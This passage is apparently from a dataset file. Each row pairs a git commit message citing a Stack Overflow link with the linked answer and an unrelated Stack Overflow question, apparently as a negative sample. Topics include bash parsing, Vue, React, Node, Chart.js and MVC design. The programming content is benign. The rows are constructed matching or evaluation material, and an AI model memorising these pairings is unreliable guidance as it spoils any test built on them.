&lt;li&gt;Extract the content between &lt;code&gt;[]&lt;/code&gt; at the end of the line into &lt;code&gt;$content&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;If &lt;code&gt;$content&lt;/code&gt; is not empty, try and split parts between &lt;code&gt;$SEP&lt;/code&gt; into &lt;code&gt;$parts&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;For each element in &lt;code&gt;$parts&lt;/code&gt;, trim trailing/leading whitespace(s)&lt;/li&gt;
&lt;li&gt;Put the trimmed sequence into an array (which naturally adds unique resources only)&lt;/li&gt;
&lt;li&gt;Write everything into &lt;code&gt;$output_file&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;With the line examples above, the result should be the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Printer DVX500
Printer DV650V 
Scanner SON2000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the script I am using, which is functionally correct (at least so far):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Get the input and output file paths from the command line arguments
input_file=&amp;quot;$1&amp;quot;
output_file=&amp;quot;$2&amp;quot;
# Check if the input file exists
if [[ ! -f &amp;quot;$input_file&amp;quot; ]]; then
    echo &amp;quot;Error: Input file '$input_file' not found!&amp;quot;
    exit 1
fi
# Use a hash table (associative array) to avoid duplicates directly in memory
declare -A unique_lines
linenumber=0
# Process the file line by line
while IFS= read -r line; do
        linenumber=$[$linenumber +1]
        if (( $linenumber%100 == 0 )); then
            echo &amp;quot;line=$linenumber&amp;quot;
        fi
    # Use sed to extract the content between the first &amp;quot;[&amp;quot; and &amp;quot;]&amp;quot;
    content=$(echo &amp;quot;$line&amp;quot; | sed -E 's/.*\[(.*)\].*/\1/')
    # If content is not empty, process the extracted part
    if [[ -n &amp;quot;$content&amp;quot; ]]; then
        # Split the content by &amp;quot;&amp;amp;&amp;quot; and process each part
        IFS=&amp;quot;&amp;amp;&amp;quot; read -ra parts &amp;lt;&amp;lt;&amp;lt; &amp;quot;$content&amp;quot;
        for part in &amp;quot;${parts[@]}&amp;quot;; do
            # Trim leading/trailing whitespace from each part
            trimmed_part=$(echo &amp;quot;$part&amp;quot; | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')
            # Store the trimmed part in the associative array (ensures uniqueness)
            unique_lines[&amp;quot;$trimmed_part&amp;quot;]=1
        done
    fi
done &amp;lt; &amp;quot;$input_file&amp;quot;
# Write the sorted, unique results to the output file
for part in &amp;quot;${!unique_lines[@]}&amp;quot;; do
    echo &amp;quot;$part&amp;quot;
done | sort &amp;gt; &amp;quot;$output_file&amp;quot; # supposed to be unique already, due to how $unique_line is fed
echo &amp;quot;Processing completed. Output saved to $output_file&amp;quot; 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The issue is performance: with &lt;code&gt;$input_files&lt;/code&gt; between 5000-10.000 lines, the
previous script takes between 12 to 30 minutes. I tried several things, but
could not figure out a way of really optimising it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;using parameter expansion for extracting the resource list, instead of &lt;code&gt;sed&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;outputing into &lt;code&gt;$output_file&lt;/code&gt; along the extraction, instead of storing results in the &lt;code&gt;$unique_lines&lt;/code&gt; array (which is way slower because of the many write operations);&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The culprit seems to be the second read followed by the for loop, but I don't
see an easy way to do Step #2 otherwise.&lt;/p&gt;
&lt;p&gt;If you have any indication on how to optimise it, even if the general algorithm is changed, I would be happy.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; &lt;em&gt;&lt;strong&gt;Completing requirements list wrt. brillant commenters remarks&lt;/strong&gt;&lt;/em&gt; :-)&lt;/p&gt;
&lt;p&gt;Thanks for the thorough analysis of my use case :-). For the sake of completeness:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;An important modification I left out:&lt;/strong&gt; Line may contains other &lt;code&gt;[...]&lt;/code&gt;, but the info I need to extract is always within the last pair. So a better test set would be the following:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;crap I don't care [CRAP] [] # This should not happen, but sometimes it does
crap I don't care [CRAPPYCRAP] [Printer DVX500]
crap I really do not care [IRREL] [CRAP!] [Printer DV650V &amp;amp; Scanner SON2000]
some other crap [!!!] [CRAPPPYYYY] [NOTHERE] [Printer DVX500 &amp;amp; Printer DV650V &amp;amp; Scanner SON2000]
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;There should not be lines without any &lt;code&gt;[...]&lt;/code&gt; group, or at least I never got the case yet. Maybe adopting a defensive line here would be better, I don't know...&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The data inside brackets may effectively vary (in lower/upper cases, in singular/plural forms, etc.) but that does not matter much, as the rest of the workflow takes these variations into consideration.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The data inside &lt;code&gt;[...]&lt;/code&gt; may occasionally have trailing/leading spaces, although rarely. For my solution, that was not an issue, as I extracted the whole content between &lt;code&gt;[...]&lt;/code&gt;, then splitted along the &lt;code&gt;[:space:]$SEP[:space:]&lt;/code&gt; characters, &lt;em&gt;then&lt;/em&gt; trimmed, which should have taken care of it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Finally, yes: sticking to &lt;code&gt;bash&lt;/code&gt; is boss-mandatory, and I fully agree with you that a GPPL would have been way better (readable, faster) than &lt;code&gt;bash&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C292</t>
  </si>
  <si>
    <t>feature - change pokemon info from evolution section
add pokemon swiper to store and composable
handle change pokemon info from PokemonEvolutionImage component
https://swiperjs.com/demos#virtual-slides
https://stackoverflow.com/questions/50449123/vue-js-scroll-to-top-of-page-for-same-route</t>
  </si>
  <si>
    <t>You can't do this through vue-router, but you can add a scroll-to-top method to every router-link.
Just create a method like this:
methods: { 
  scrollToTop() {
    window.scrollTo(0,0);
  }
}
Add it to the link:
&lt;router-link @click.native="$scrollToTop"&gt;
If you want to use it outside of your footer too, it's better to add it to the Vue prototype
Vue.prototype.$scrollToTop = () =&gt; window.scrollTo(0,0)
It's not a 100% solution but it's the simplest one</t>
  </si>
  <si>
    <t xml:space="preserve">I  work in an organization that relies heavily on technology standards. For the most past this is great and helps provide direction to developers and helps them move across teams really easily.
However in the past year I have discovered more effective ways of doing things using new technologies and I am struggling to get these strategies added to the technology road map.
Has anyone had this experience and if so what have they done to bring about change in the organization?
</t>
  </si>
  <si>
    <t>C293</t>
  </si>
  <si>
    <t>We're going to commit bower_components instead of ignoring it!
http://stackoverflow.com/questions/22327758/should-bower-components-be-gitignored</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Background:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I am trying to add Toast notifications to my &lt;code&gt;nextjs&lt;/code&gt; application. I followed the official documentation here: &lt;a href="https://www.heroui.com/docs/components/toast" rel="nofollow noreferrer"&gt;https://www.heroui.com/docs/components/toast&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;providers.jsx&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import {NextUIProvider} from '@nextui-org/react'
import {useRouter} from &amp;quot;next/navigation&amp;quot;;
import {ThemeProvider as NextThemesProvider} from &amp;quot;next-themes&amp;quot;;
import {HeroUIProvider} from &amp;quot;@heroui/react&amp;quot;;
import {ToastProvider} from &amp;quot;@heroui/toast&amp;quot;;
export function Providers({children}) {
    const router = useRouter()
    return (
        &amp;lt;NextUIProvider navigate={router.push}&amp;gt;
            &amp;lt;NextThemesProvider attribute=&amp;quot;class&amp;quot; defaultTheme=&amp;quot;dark&amp;quot;&amp;gt;
                &amp;lt;HeroUIProvider&amp;gt;
                    &amp;lt;ToastProvider toastProps={{
                        radius: &amp;quot;full&amp;quot;,
                        color: &amp;quot;primary&amp;quot;,
                        variant: &amp;quot;bordered&amp;quot;,
                        timeout: 1500,
                        hideIcon: true,
                        classNames: {
                            closeButton: &amp;quot;opacity-100 absolute right-4 top-1/2 -translate-y-1/2&amp;quot;,
                        },
                    }} /&amp;gt;
                    {children}
                &amp;lt;/HeroUIProvider&amp;gt;
            &amp;lt;/NextThemesProvider&amp;gt;
        &amp;lt;/NextUIProvider&amp;gt;
    )
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;layout.js&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;export default function RootLayout({children}) {
    return (
        &amp;lt;html lang=&amp;quot;en&amp;quot; suppressHydrationWarning&amp;gt;
        &amp;lt;head title=&amp;quot;Hydra Server&amp;quot;&amp;gt;
            &amp;lt;meta name=&amp;quot;viewport&amp;quot; content=&amp;quot;width=device-width, initial-scale=1.0&amp;quot;/&amp;gt;
            &amp;lt;title&amp;gt;Hydra Server&amp;lt;/title&amp;gt;
        &amp;lt;/head&amp;gt;
        &amp;lt;body
            className={`${geistSans.variable} ${geistMono.variable} antialiased`}
        &amp;gt;
        &amp;lt;Providers&amp;gt;
            &amp;lt;main className=&amp;quot;bg-gradient-to-br from-black via-gray-700 to-green-900&amp;quot;&amp;gt;
                {children}
            &amp;lt;/main&amp;gt;
        &amp;lt;/Providers&amp;gt;
        &amp;lt;/body&amp;gt;
        &amp;lt;/html&amp;gt;
    );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Example of adding a Toast:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import {addToast} from &amp;quot;@heroui/toast&amp;quot;;
...
    function onError(error) {
        addToast({
            title: &amp;quot;Error&amp;quot;,
            description: error.statusText
        });
        setIsLoading(false)
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;The problem:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When the page is compiled (I'm currently using &lt;code&gt;npm run dev&lt;/code&gt; for testing), I get the following errors:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt; â¨¯ ./node_modules/@heroui/toast/dist/chunk-A3E4DQTR.mjs:5:1
Export toast doesn't exist in target module
  3 | // src/use-toast.ts
  4 | import { mapPropsVariants, useProviderContext } from &amp;quot;@heroui/system&amp;quot;;
&amp;gt; 5 | import { toast as toastTheme } from &amp;quot;@heroui/theme&amp;quot;;
    | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6 | import { useDOMRef } from &amp;quot;@heroui/react-utils&amp;quot;;
  7 | import { clsx, dataAttr, isEmpty, objectToDeps } from &amp;quot;@heroui/shared-utils&amp;quot;;
  8 | import { useCallback, useEffect, useLayoutEffect, useMemo, useRef, useState } from &amp;quot;react&amp;quot;;
The export toast was not found in module [project]/node_modules/@heroui/theme/dist/index.mjs [app-client] (ecmascript) &amp;lt;exports&amp;gt;.
Did you mean to import tabs?
All exports of the module are statically known (It doesn't have dynamic exports). So it's known statically that the requested export doesn't exist.
./node_modules/@heroui/toast/dist/chunk-RJHHOZ5N.mjs:11:1
Export toastRegion doesn't exist in target module
   9 | import { useHover } from &amp;quot;@react-aria/interactions&amp;quot;;
  10 | import { mergeProps } from &amp;quot;@react-aria/utils&amp;quot;;
&amp;gt; 11 | import { toastRegion } from &amp;quot;@heroui/theme&amp;quot;;
     | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  12 | import { jsx } from &amp;quot;react/jsx-runtime&amp;quot;;
  13 | function ToastRegion({
  14 |   toastQueue,
The export toastRegion was not found in module [project]/node_modules/@heroui/theme/dist/index.mjs [app-client] (ecmascript) &amp;lt;exports&amp;gt;.
Did you mean to import listboxSection?
All exports of the module are statically known (It doesn't have dynamic exports). So it's known statically that the requested export doesn't exist.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this a bug or a problem with my setup?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C294</t>
  </si>
  <si>
    <t>Actual shell component added
base on:
https://stackoverflow.com/questions/12006417/node-js-server-that-accepts-post-requests</t>
  </si>
  <si>
    <t>The following code shows how to read values from an HTML form. As @pimvdb said you need to use the request.on('data'...) to capture the contents of the body.
const http = require('http')
const server = http.createServer(function(request, response) {
  console.dir(request.param)
  if (request.method == 'POST') {
    console.log('POST')
    var body = ''
    request.on('data', function(data) {
      body += data
      console.log('Partial body: ' + body)
    })
    request.on('end', function() {
      console.log('Body: ' + body)
      response.writeHead(200, {'Content-Type': 'text/html'})
      response.end('post received')
    })
  } else {
    console.log('GET')
    var html = `
            &lt;html&gt;
                &lt;body&gt;
                    &lt;form method="post" action="http://localhost:3000"&gt;Name: 
                        &lt;input type="text" name="name" /&gt;
                        &lt;input type="submit" value="Submit" /&gt;
                    &lt;/form&gt;
                &lt;/body&gt;
            &lt;/html&gt;`
    response.writeHead(200, {'Content-Type': 'text/html'})
    response.end(html)
  }
})
const port = 3000
const host = '127.0.0.1'
server.listen(port, host)
console.log(`Listening at http://${host}:${port}`)
If you use something like
Express.js
and
Bodyparser
then it would look like this since Express will handle the request.body concatenation
const express = require('express')
const fs = require('fs')
const app = express()
const bodyParser = require("body-parser");
// parse application/x-www-form-urlencoded
app.use(bodyParser.urlencoded({ extended: false }))
// parse application/json
app.use(bodyParser.json())
app.get('/', function(request, response) {
  console.log('GET /')
  const html = `
    &lt;html&gt;
        &lt;body&gt;
            &lt;form method="post" action="http://localhost:3000"&gt;Name: 
                &lt;input type="text" name="name" /&gt;
                &lt;input type="submit" value="Submit" /&gt;
            &lt;/form&gt;
        &lt;/body&gt;
    &lt;/html&gt;`
  response.writeHead(200, {'Content-Type': 'text/html'})
  response.end(html)
})
app.post('/', function(request, response) {
  console.log('POST /')
  console.dir(request.body)
  response.writeHead(200, {'Content-Type': 'text/html'})
  response.end('thanks')
})
const port = 3000
app.listen(port)
console.log(`Listening at http://localhost:${port}`)</t>
  </si>
  <si>
    <t xml:space="preserve">I have a system that creates an order and that order can be billed to a house account, sent Cash on Delivery (COD), or charged to a credit card.  I've created the following tables:
ORDERS
order_id
billingoption_id
BILLINGOPTIONS
billingoption_id
I'm unsure of how the next table should be built for the billing data.  Should I build a separate table for each type of billing option (ie. COD, Credit Cards, and House Account)?  Then would I have another foreign key column on the Orders table that would refer to a record for the billing data?
</t>
  </si>
  <si>
    <t>C295</t>
  </si>
  <si>
    <t xml:space="preserve"> feat: add toolbar in ClientsFragment
&lt;Toolbar&gt;
ref: https://material.io/components/app-bars-top/android#using-top-app-bars
&lt;Toolbar Title Style&gt;
ref: https://material.io/design/material-theming/implementing-your-theme.html#typography
&lt;Toolbar Elevation&gt;
ref: https://stackoverflow.com/questions/35724308/android-toolbar-elevation-when-scrolling</t>
  </si>
  <si>
    <t>EDIT As pointed out in the comments, my answer is now outdated, see https://stackoverflow.com/a/58272283/4291272
Whether you are using a CoordinatorLayout or not, a RecyclerView.OnScrollListener seems like the right way to go as far as the elevation is concerned. However, from my experience recyclerview.getChild(0).getTop() is not reliable and should not be used for determining the scrolling state. Instead, this is what's working:
private static final int SCROLL_DIRECTION_UP = -1;
// ...
// Put this into your RecyclerView.OnScrollListener &gt; onScrolled() method
if (recyclerview.canScrollVertically(SCROLL_DIRECTION_UP)) {
   // Remove elevation
   toolbar.setElevation(0f);
} else {
   // Show elevation
   toolbar.setElevation(50f);
}
Be sure to assign a LayoutManager to your RecyclerView or the call of canScrollVertically may cause a crash!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im developing an app and testing on iOS, Windows and Android.
Windows is fine, Android too, but the iOS simulator is throwing up some strange behaviour in terms of button sizing? Malformed I suppose?&lt;/p&gt;
&lt;p&gt;The buttons are made like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Button
    Grid.Column=&amp;quot;0&amp;quot;
    Background=&amp;quot;{AppThemeBinding Light={StaticResource CoolBlueLight},
                                 Dark={StaticResource CoolBlueMid}}&amp;quot;
    Command=&amp;quot;{Binding PreviousTreeCommand}&amp;quot;
    CornerRadius=&amp;quot;5&amp;quot;
    FontSize=&amp;quot;Medium&amp;quot;
    Text=&amp;quot;Previous&amp;quot;
    TextColor=&amp;quot;{AppThemeBinding Light=Black,
                                Dark=White}&amp;quot; /&amp;gt;
&amp;lt;Button
    Grid.Column=&amp;quot;1&amp;quot;
    Background=&amp;quot;{AppThemeBinding Light={StaticResource ForestLight},
                                 Dark={StaticResource ForestMid}}&amp;quot;
    Command=&amp;quot;{Binding NextTreeCommand}&amp;quot;
    CornerRadius=&amp;quot;5&amp;quot;
    FontSize=&amp;quot;Medium&amp;quot;
    Text=&amp;quot;Next&amp;quot;
    TextColor=&amp;quot;{AppThemeBinding Light=Black,
                                Dark=White}&amp;quot; /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The buttons appear normally on Android and Windows, but on iOS they are oversized, and mis-shaped. They seem to be taking up the rest of the screen space below and to the right, and arent rounded or styled as they should be. Its happening with all of the general buttons across the application on iOS, but these 2 show the best example.&lt;/p&gt;
&lt;p&gt;Here are the buttons on android:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://i.sstatic.net/19ToKry3.png" alt="Android Buttons Screenshot" /&gt;&lt;/p&gt;
&lt;p&gt;And on windows:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://i.sstatic.net/2f5RjRlM.png" alt="Windows Buttons Screenshot" /&gt;&lt;/p&gt;
&lt;p&gt;But on iOS it does something like this:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://i.sstatic.net/oJ1gRNXA.png" alt="iOS Buttons Screenshot" /&gt;&lt;/p&gt;
&lt;p&gt;Whats going on with the behaviour here? is there anything i need to account for in terms of styling for iOS thats differeing from the other 2 platforms?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C296</t>
  </si>
  <si>
    <t>Change WordEditor back to class component
Text fields lost focues after typing.
See: https://stackoverflow.com/questions/42573017/in-react-es6-why-does-the-input-field-lose-focus-after-typing-a-character</t>
  </si>
  <si>
    <t>it is because you are rendering the form in a function inside render().
Every time your state/prop change, the function returns a new form. it caused you to lose focus.
Try putting what's inside the function into your render directly.
&lt;main id="main" role="main"&gt;
    &lt;div className="container-fluid"&gt;
        &lt;FormPostSingle /&gt;
    &lt;/div&gt;
&lt;/main&gt;
===&gt;
&lt;main id="main" role="main"&gt;
    &lt;div className="container-fluid"&gt;
        &lt;form onSubmit={onSubmit}&gt;
            &lt;InputText name="title" label="Title" placeholder="Enter a title" onChange={onChange} value={valueTitle} /&gt;
            &lt;InputSubmit name="Save" /&gt;
        &lt;/form&gt;
    &lt;/div&gt;
&lt;/main&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">I've seen quite a few developer job postings recently that include a sentence that reads more or less like this: "Must have experience with N-Tier architecture", or "Must be able to develop N-Tier apps".
This leads me to ask, what is N-Tier architecture? How does one gain experience with it?
</t>
  </si>
  <si>
    <t>C297</t>
  </si>
  <si>
    <t xml:space="preserve">refactor(component): update ChartJS configs to match chart.js v4.0.0
  ## what
  - update chart.js config for bar charts
    - add `TimeSeriesScale` to ChartJS register
    - change x scale type from `time` to `timeseries`
    - change config for drawing border from `drawBorder` to `display`
    - disable warning for using `console.log`
  ## how
  - check resources
    - https://www.chartjs.org/docs/latest/migration/v4-migration.html
    - https://react-chartjs-2.js.org/faq/registered-scale/
    - https://stackoverflow.com/a/73677773
</t>
  </si>
  <si>
    <t>Fixed with importing "TimeScale" from Chart.js module. Then added TimeScale argument to Chart.register function. At the end:
import {Chart, LinearScale, PointElement, Tooltip, Legend, TimeScale} from "chart.js"; 
ChartJS.register(LinearScale, PointElement, Tooltip, Legend, TimeScale);
These fixed everything.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am tasked with monitoring certain software releases in specific environemnts. I have two tables. The first one, Table1-Releaseed-Software, contains releases and environments we currently have in the wild.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Here it is&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;Table1-Releaseed-Software&lt;/p&gt;
&lt;div class="s-table-container"&gt;&lt;table class="s-table"&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Release&lt;/th&gt;
&lt;th&gt;Environment&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;release1&lt;/td&gt;
&lt;td&gt;environment1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release2&lt;/td&gt;
&lt;td&gt;production&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release3&lt;/td&gt;
&lt;td&gt;test&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release4&lt;/td&gt;
&lt;td&gt;test2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release5,release6,release7&lt;/td&gt;
&lt;td&gt;production&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release8,release9,release10&lt;/td&gt;
&lt;td&gt;test3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release11,release12,release13&lt;/td&gt;
&lt;td&gt;alpha&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release14,release15,release16&lt;/td&gt;
&lt;td&gt;beta&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;p&gt;The second table contains releases and environments I need to monitor.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Here it is&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;Table2-Monitored-Releases&lt;/p&gt;
&lt;div class="s-table-container"&gt;&lt;table class="s-table"&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Release&lt;/th&gt;
&lt;th&gt;Environment&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;release3&lt;/td&gt;
&lt;td&gt;test&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release4&lt;/td&gt;
&lt;td&gt;environment5&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release12&lt;/td&gt;
&lt;td&gt;alpha&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release16&lt;/td&gt;
&lt;td&gt;beta&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;p&gt;I need to come up with a table which will filter Table 1 using table 2.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My end result should look like this&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;Table3-filtered-monitored-releases&lt;/p&gt;
&lt;div class="s-table-container"&gt;&lt;table class="s-table"&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Release&lt;/th&gt;
&lt;th&gt;Environment&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;release3&lt;/td&gt;
&lt;td&gt;test&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release11,release12,release13&lt;/td&gt;
&lt;td&gt;alpha&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;release14,release15,release16&lt;/td&gt;
&lt;td&gt;beta&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;p&gt;The first row is obvious. It is a simple intersection of the first and second tables (&lt;code&gt;INNER JOIN&lt;/code&gt;). The reason the row with &lt;code&gt;release4&lt;/code&gt; is not included in the result is because environments don't match. The reason 2nd and 3rd rows are included in the result is because the &lt;code&gt;Release&lt;/code&gt; string of Table 1 matches one of the &lt;code&gt;Release&lt;/code&gt; strings in Table 2, i.e. it &lt;code&gt;CONTAINS&lt;/code&gt; one of the strings in &lt;code&gt;Release&lt;/code&gt; column of Table 2. Environments match as well.&lt;/p&gt;
&lt;p&gt;I've been racking my brain on how to do it but I'm struggling. I'm not a SQL expert. Any help with this is appreciated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;
My company is using a proprietary query language, which is very similar to SQL. The language does not have &lt;code&gt;FIND_IN_SET&lt;/code&gt; functionality.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C298</t>
  </si>
  <si>
    <t>fixed checksum mismatch running the dev server
im not completely sure why this works, but based on http://stackoverflow.com/questions/33521047/warning-react-attempted-to-reuse-markup-in-a-container-but-the-checksum-was-inv#33521172</t>
  </si>
  <si>
    <t>Note: This applies to older versions of React.
If you're using React 16, you should use
ReactDOM.hydrate()
Also
, the below suggestion will result in a client-side re-render, as suggested by one of the answers below.
This may sound crazily simple, but in your server-side template, wrap your React markup in an extra
&lt;div&gt;
:
&lt;!-- hypothetical handlebars template --&gt;
&lt;section role="main" class="react-container"&gt;&lt;div&gt;{{{reactMarkup}}}&lt;/div&gt;&lt;/section&gt;
Why does this work? On the client, React has a propensity to wrap its rendering of your root component with a superfluous div.
ReactDOMServer.render
doesn't seem to behave in this manner, thus when one renders into the same container isomorphically, the Adler-32 checksum of your DOM differs.</t>
  </si>
  <si>
    <t xml:space="preserve">If you were to build a badge system similiar to how SO does it, would you put the logic/business layer in the database directly (via stored procedure, scheduled sql jobs) or put it in the server side?
From what I can think of, you have to:
list badges that pertain to the current user action
check if the user has a badge already or not
insert badge for user 
Potential options
business logic in the web application that calls stored procedures etc.
stored procedures ONLY
sql server job that runs every x minutes
windows service that runs every x minutes
Would a combination of these be required? I think it would since some badges are based on milestones for a given question, maybe a batch job is better?
Update
A system where you can modify the badge system, then re-run the entire badge linking for everyone would be even better.  i.e. say you change the logic for some badges, now you have to re-apply it to all the questions/answers/votes/etc.
interesting problem to solve!!
</t>
  </si>
  <si>
    <t>C299</t>
  </si>
  <si>
    <t>Update pgevent-component.adoc
Add a section for common problems, explaining a very undocumented issue when trying to use a DataSource to connect to a PostgreSQL database.
More on the issue: https://stackoverflow.com/questions/64445026</t>
  </si>
  <si>
    <t>I'm copying my own solution from the question into the answer section, as it may help others find the solution when the question is marked solved. Below is the copy of the final solution:
In the end, the "normal" jdbc:postgresql:/... url I was using did not
work. So I followed the linked SO-answer, suggesting using the
pgjdbc-ng driver (my colleague suggested the same). Following the
documentation of the second link I found that my Camel route started
working. All I needed to do was change the previous DataSource url to
jdbc:pgsql:/....</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to know the last hit break point number in GDB debugging C code.
The &lt;code&gt;info break/breakpoints&lt;/code&gt; command list all the available breakpoints but does not displays the break point at which the current program is.&lt;/p&gt;
&lt;p&gt;I understand that by switching between the files and looking for &lt;code&gt;&amp;gt;&lt;/code&gt; sign we can know that this is the current hit break point. But in case of large number of source files using this way is time consuming.&lt;/p&gt;
&lt;p&gt;From the GDB command list I saw a command &lt;code&gt;print $bpnum&lt;/code&gt; which displays the last hit break point number. But this command &lt;code&gt;print $bpnum&lt;/code&gt; is not working. It is always showing the older break(last hit) point numbers and not the updated one.&lt;/p&gt;
&lt;p&gt;Any inputs on this will be helpful.&lt;/p&gt;
&lt;p&gt;OS : Ubuntu 18.04,Linux 5.4.0
HW platform : x86-64&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C3</t>
  </si>
  <si>
    <t>Update structure-controllers.md
In MVC, the "M" is a model -layer-, and not just a collection of models. If we don't teach this to new users, they will quickly end up with heavily bloated model classes.
Maybe this deserves some attention in other introduction pages as well.
http://stackoverflow.com/questions/5863870/how-should-a-model-be-structured-in-mvc</t>
  </si>
  <si>
    <t>Disclaimer: the following is a description of how I understand MVC-like patterns in the context of PHP-based web applications. All the external links that are used in the content are there to explain terms and concepts, and not to imply my own credibility on the subject.
The first thing that I must clear up is: the model is a layer.
Second: there is a difference between classical MVC and what we use in web development. Here's a bit of an older answer I wrote, which briefly describes how they are different.
What a model is NOT:
The model is not a class or any single object. It is a very common mistake to make (I did too, though the original answer was written when I began to learn otherwise), because most frameworks perpetuate this misconception.
Neither is it an Object-Relational Mapping technique (ORM) nor an abstraction of database tables. Anyone who tells you otherwise is most likely trying to 'sell' another brand-new ORM or a whole framework.
What a model is:
In proper MVC adaptation, the M contains all the domain business logic and the Model Layer is mostly made from three types of structures:
Domain Objects
A domain object is a logical container of purely domain information; it usually represents a logical entity in the problem domain space. Commonly referred to as business logic.
This would be where you define how to validate data before sending an invoice, or to compute the total cost of an order. At the same time, Domain Objects are completely unaware of storage - neither from where (SQL database, REST API, text file, etc.) nor even if they get saved or retrieved.
Data Mappers
These objects are only responsible for the storage. If you store information in a database, this would be where the SQL lives. Or maybe you use an XML file to store data, and your Data Mappers are parsing from and to XML files.
Services
You can think of them as "higher level Domain Objects", but instead of business logic, Services are responsible for interaction between Domain Objects and Mappers. These structures end up creating a "public" interface for interacting with the domain business logic. You can avoid them, but at the penalty of leaking some domain logic into Controllers.
There is a related answer to this subject in the ACL implementation question - it might be useful.
The communication between the model layer and other parts of the MVC triad should happen only through Services. The clear separation has a few additional benefits:
it helps to enforce the single responsibility principle (SRP)
provides additional 'wiggle room' in case the logic changes
keeps the controller as simple as possible
gives a clear blueprint, if you ever need an external API
How to interact with a model?
